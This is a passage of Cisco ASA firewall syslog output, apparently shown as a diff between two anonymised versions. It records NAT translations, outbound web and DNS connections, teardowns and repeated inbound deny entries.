inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308 -Oct 10 2018 12:34:56 
localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: 
%ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" 
[0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 
0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] 
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to 
inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I +Oct 10 2018 12:34:56 
localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257 +Oct 10 2018 
12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 
2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 
(172.31.98.44/1453) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) 
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built 
outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to 
inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src 
outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) +Oct 10 2018 